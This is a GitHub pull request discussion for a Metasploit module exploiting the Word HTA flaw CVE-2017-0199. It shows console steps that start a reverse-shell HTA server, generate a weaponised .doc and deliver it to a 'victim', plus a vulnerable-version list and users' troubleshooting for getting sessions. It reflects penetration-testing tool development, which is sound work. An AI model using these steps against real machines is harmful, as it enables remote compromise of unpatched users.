CVE-2017-0199 - Office Word HTA Module #8254

Merged
merged 8 commits into from Apr 24, 2017

Conversation

Projects
None yet
8 participants
@nixawk
Contributor

nixawk commented Apr 17, 2017

@wvu-r7 @wchen-r7 @busterb Please check it. The details about the module is here #8220 .

msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options

Module options (exploit/windows/misc/hta_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Powershell x86


msf exploit(hta_server) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 10.97.100.101:4444
[*] Using URL: http://0.0.0.0:8080/ETTtwiMhS.hta
[*] Local IP: http://10.00.100.101:8080/ETTtwiMhS.hta
[*] Server started.
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   FILENAME                                no        The file name.
   TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf exploit(office_word_hta) > set TARGETURI http://10.97.100.101:8080/ETTtwiMhS.hta
TARGETURI => http://10.00.100.101:8080/ETTtwiMhS.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run

[+] msf.doc stored at /Users/securitytest/.msf4/local/msf.doc

Copy /Users/securitytest/.msf4/local/msf.doc into a victim machine, and open it with Microsoft Word....

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 17, 2017

Contributor

If hat_server is used. a black flash window will come. A new pr wants to fix the issue.

Another question:

  • Is it necessary to add a hta server feature in the module ? It can gain a session without exploit/windows/misc/hta_server
Contributor

nixawk commented Apr 17, 2017

If hat_server is used. a black flash window will come. A new pr wants to fix the issue.

Another question:

  • Is it necessary to add a hta server feature in the module ? It can gain a session without exploit/windows/misc/hta_server
@busterb

this needs some docs too, but looks good!

+ # require 'rex/ole'
+ # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+ # ministream = ole.instance_variable_get(:@ministream)
+ # ministream_data = ministream.instance_variable_get(:@data)

This comment has been minimized.

@busterb

busterb Apr 17, 2017

Contributor

we should take a look at what was broken in rex-ole, e.g. is it disallowing us to parse a corrupted document

@busterb

busterb Apr 17, 2017

Contributor

we should take a look at what was broken in rex-ole, e.g. is it disallowing us to parse a corrupted document

This comment has been minimized.

@nixawk

nixawk Apr 18, 2017

Contributor

RTF may be not a corrupted document. Please check my steps.


  1. Original RTF is created by Office Word 2010 on Windows 7. I've try to recreate a new one with the same issue.

  2. Show OLE Object info with oletools - rtfobj

$ rtfobj cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
  1. Dump OLE object with rtfobj.
$ rtfobj -s 0 cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'OLE2Link'
  data size  = 2560
  saving to file cve-2017-0199.rtf_object_00002A2A.bin
  1. When rtf is dumped successfully, Please try to parse OLE Object binary data with read_oleobject.rb
$ ruby read_oleobject.rb cve-2017-0199.rtf_object_00002A2A.bin
4
- #<Dirent:"Root Entry">
  |- #<Dirent:"\u0001Ole" size=162 data="\x01\x00\x00\x02\t...">
  |- #<Dirent:"\u0003ObjInfo" size=6 data="\x10\x02\x03\x00\x04\x00">
  \- #<Dirent:"\u0003LinkInfo" size=102 data="\x1E\x00htt...">

From: /Users/Open-Security/Code/labs/CVE-2017-0199/read_oleobject.rb @ line 26 Object#read_ole_ministream:

    14: def read_ole_ministream(filename)
    15:   # ole/storage
    16:   ole = Ole::Storage.open(filename, 'rb+')
    17:   puts ole.dirents.length
    18:   puts ole.root.to_tree
    19:
    20:   # rex/ole
    21:   ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    22:   ministream = ole.instance_variable_get(:@ministream)
    23:   data = ministream.instance_variable_get(:@data)
    24:
    25:
 => 26:   binding.pry
    27:
    28:   olebin = ::File.open("#{filename}-ministream_data.bin", 'wb+')
    29:   olebin.write(data)
    30:   olebin.close
    31: end

[1] pry(main)> data
=> "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\v>\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00 \xED\xE0P\x9D\xB8\xD2\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB1\x00\x05\x00\x10\x00\b\x01\x10\x02\x03\x00\x04\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAC\x00\x05\x00\x1F\x00\b\x01\xC0\x81\xA7\bx\x01\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00http://www.baidu.com/index.htm\x00\x00\xBB\xBB\xCC\xCC\x1E\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
@nixawk

nixawk Apr 18, 2017

Contributor

RTF may be not a corrupted document. Please check my steps.


  1. Original RTF is created by Office Word 2010 on Windows 7. I've try to recreate a new one with the same issue.

  2. Show OLE Object info with oletools - rtfobj

$ rtfobj cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
  1. Dump OLE object with rtfobj.
$ rtfobj -s 0 cve-2017-0199.rtf
rtfobj 0.50 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'cve-2017-0199.rtf' - size: 37633 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |00002A2Ah |format_id: 2                   |Not an OLE Package
   |          |class name: 'OLE2Link'         |
   |          |data size: 2560                |
---+----------+-------------------------------+-------------------------------
Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'OLE2Link'
  data size  = 2560
  saving to file cve-2017-0199.rtf_object_00002A2A.bin
  1. When rtf is dumped successfully, Please try to parse OLE Object binary data with read_oleobject.rb
$ ruby read_oleobject.rb cve-2017-0199.rtf_object_00002A2A.bin
4
- #<Dirent:"Root Entry">
  |- #<Dirent:"\u0001Ole" size=162 data="\x01\x00\x00\x02\t...">
  |- #<Dirent:"\u0003ObjInfo" size=6 data="\x10\x02\x03\x00\x04\x00">
  \- #<Dirent:"\u0003LinkInfo" size=102 data="\x1E\x00htt...">

From: /Users/Open-Security/Code/labs/CVE-2017-0199/read_oleobject.rb @ line 26 Object#read_ole_ministream:

    14: def read_ole_ministream(filename)
    15:   # ole/storage
    16:   ole = Ole::Storage.open(filename, 'rb+')
    17:   puts ole.dirents.length
    18:   puts ole.root.to_tree
    19:
    20:   # rex/ole
    21:   ole = Rex::OLE::Storage.new(filename, Rex::OLE::STGM_READ)
    22:   ministream = ole.instance_variable_get(:@ministream)
    23:   data = ministream.instance_variable_get(:@data)
    24:
    25:
 => 26:   binding.pry
    27:
    28:   olebin = ::File.open("#{filename}-ministream_data.bin", 'wb+')
    29:   olebin.write(data)
    30:   olebin.close
    31: end

[1] pry(main)> data
=> "\x01\x00\x00\x02\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00V\x00\x00\x00\xE0\xC9\xEAy\xF9\xBA\xCE\x11\x8C\x82\x00\xAA\x00K\xA9\v>\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\xFF\xFF\xFF\xFF i3%\xF9\x03\xCF\x11\x8F\xD0\x00\xAA\x00ho\x13\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00 \xED\xE0P\x9D\xB8\xD2\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB1\x00\x05\x00\x10\x00\b\x01\x10\x02\x03\x00\x04\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAC\x00\x05\x00\x1F\x00\b\x01\xC0\x81\xA7\bx\x01\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x00http://www.baidu.com/index.htm\x00\x00\xBB\xBB\xCC\xCC\x1E\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00b\x00a\x00i\x00d\x00u\x00.\x00c\x00o\x00m\x00/\x00i\x00n\x00d\x00e\x00x\x00.\x00h\x00t\x00m\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+
+ def create_rtf_format
+ template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
+ template_rtf = ::File.open(template_path, 'rb')

This comment has been minimized.

@busterb

busterb Apr 17, 2017

Contributor

TODO - it would be nice if there was a wrapper to get a data directory file (not needed for this module)

@busterb

busterb Apr 17, 2017

Contributor

TODO - it would be nice if there was a wrapper to get a data directory file (not needed for this module)

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 18, 2017

Contributor

Thanks @busterb . I'll add module doc later.

Contributor

nixawk commented Apr 18, 2017

Thanks @busterb . I'll add module doc later.

@jooeji

This comment has been minimized.

Show comment
Hide comment
@jooeji

jooeji Apr 18, 2017

_20170418151013
it's time so long

jooeji commented Apr 18, 2017

_20170418151013
it's time so long

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 18, 2017

Contributor

@jooeji Could you share the packet here ? If you failed to exploit CVE-2017-0199, please try it with a IE cache clean.

Thanks @busterb Module doc is added.

Contributor

nixawk commented Apr 18, 2017

@jooeji Could you share the packet here ? If you failed to exploit CVE-2017-0199, please try it with a IE cache clean.

Thanks @busterb Module doc is added.

@wchen-r7 wchen-r7 self-assigned this Apr 18, 2017

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 21, 2017

Contributor

Any question for the module ?

Contributor

nixawk commented Apr 21, 2017

Any question for the module ?

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Apr 21, 2017

Contributor

I'll take over from here. I will be landing this soon. Sorry for the wait. And thanks!

Contributor

wchen-r7 commented Apr 21, 2017

I'll take over from here. I will be landing this soon. Sorry for the wait. And thanks!

@wchen-r7 wchen-r7 merged commit 0a085c4 into rapid7:master Apr 24, 2017

1 check passed

continuous-integration/travis-ci/pr The Travis CI build passed
Details

wchen-r7 added a commit that referenced this pull request Apr 24, 2017

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Apr 24, 2017

Contributor

Release Notes

The exploit/windows/misc/hta_server module has been added to the framework. It exploits a Microsoft Office vulnerability that started off as an 0day being exploited in the wild. By using an OLE2 link object in a doc or RTF file, it is possible to abuse the HTA handler, which will allow the document to download a malicious HTA application and execute it.

Contributor

wchen-r7 commented Apr 24, 2017

Release Notes

The exploit/windows/misc/hta_server module has been added to the framework. It exploits a Microsoft Office vulnerability that started off as an 0day being exploited in the wild. By using an OLE2 link object in a doc or RTF file, it is possible to abuse the HTA handler, which will allow the document to download a malicious HTA application and execute it.

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Apr 24, 2017

Contributor

Sorry for the slow response. I modified the exploit to run its own HTA server, and it allows the HTA window to be invisible. Also updated the doc a little.

Contributor

wchen-r7 commented Apr 24, 2017

Sorry for the slow response. I modified the exploit to run its own HTA server, and it allows the HTA window to be invisible. Also updated the doc a little.

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 25, 2017

Contributor

Thanks @wchen-r7 .

Contributor

nixawk commented Apr 25, 2017

Thanks @wchen-r7 .

@C6h0st

This comment has been minimized.

Show comment
Hide comment
@C6h0st

C6h0st Apr 26, 2017

I have tried the old and new version of this module but it failed on Windows 7 with all Office (2007->2016), i also tried with both fresh and normal VM. The process WINWORD.exe just download .hta file but doesn't execute the payload. Is anybody has the same problem ?

C6h0st commented Apr 26, 2017

I have tried the old and new version of this module but it failed on Windows 7 with all Office (2007->2016), i also tried with both fresh and normal VM. The process WINWORD.exe just download .hta file but doesn't execute the payload. Is anybody has the same problem ?

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Apr 26, 2017

Contributor

Please read the module info, and check your lab version. I've failed to exploit it on Windows 7, but ok on Windows 7 sp 1.

Vulnerable OS list, ex:

Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Microsoft Office 2007 Service Pack 3
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Contributor

nixawk commented Apr 26, 2017

Please read the module info, and check your lab version. I've failed to exploit it on Windows 7, but ok on Windows 7 sp 1.

Vulnerable OS list, ex:

Windows Vista Service Pack 2
Windows Vista x64 Edition Service Pack 2
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Microsoft Office 2007 Service Pack 3
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
@kalifan

This comment has been minimized.

Show comment
Hide comment
@kalifan

kalifan Apr 27, 2017

@nixawk Hi i dont know why it does not work fine. i have running windows 7 sp1, Office 2016 pro plus 64 bits could be AV?

i have an screenshot to show you.

hta

kalifan commented Apr 27, 2017

@nixawk Hi i dont know why it does not work fine. i have running windows 7 sp1, Office 2016 pro plus 64 bits could be AV?

i have an screenshot to show you.

hta

@C6h0st

This comment has been minimized.

Show comment
Hide comment
@C6h0st

C6h0st Apr 27, 2017

I have same problem as @kalifan on Windows 7 sp1 with Office 2013 sp1

C6h0st commented Apr 27, 2017

I have same problem as @kalifan on Windows 7 sp1 with Office 2013 sp1

@kalifan

This comment has been minimized.

Show comment
Hide comment
@kalifan

kalifan Apr 29, 2017

@C6h0st i try with the new exploit from exploit-db and it does not work fine too. :(
https://www.exploit-db.com/exploits/41934/
2017-04-28_234017

kalifan commented Apr 29, 2017

@C6h0st i try with the new exploit from exploit-db and it does not work fine too. :(
https://www.exploit-db.com/exploits/41934/
2017-04-28_234017

@digexploit

This comment has been minimized.

Show comment
Hide comment
@digexploit

digexploit Apr 30, 2017

I have a same problem as jooeji, do not can back a meterpreter

I have a same problem as jooeji, do not can back a meterpreter

@nixawk

This comment has been minimized.

Show comment
Hide comment
@nixawk

nixawk Jul 18, 2017

Contributor
Contributor

nixawk commented Jul 18, 2017

@kalifan

This comment has been minimized.

Show comment
Hide comment
@kalifan

kalifan Jul 19, 2017

@nixawk almost we can keep trying thanks bro

kalifan commented Jul 19, 2017

@nixawk almost we can keep trying thanks bro

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment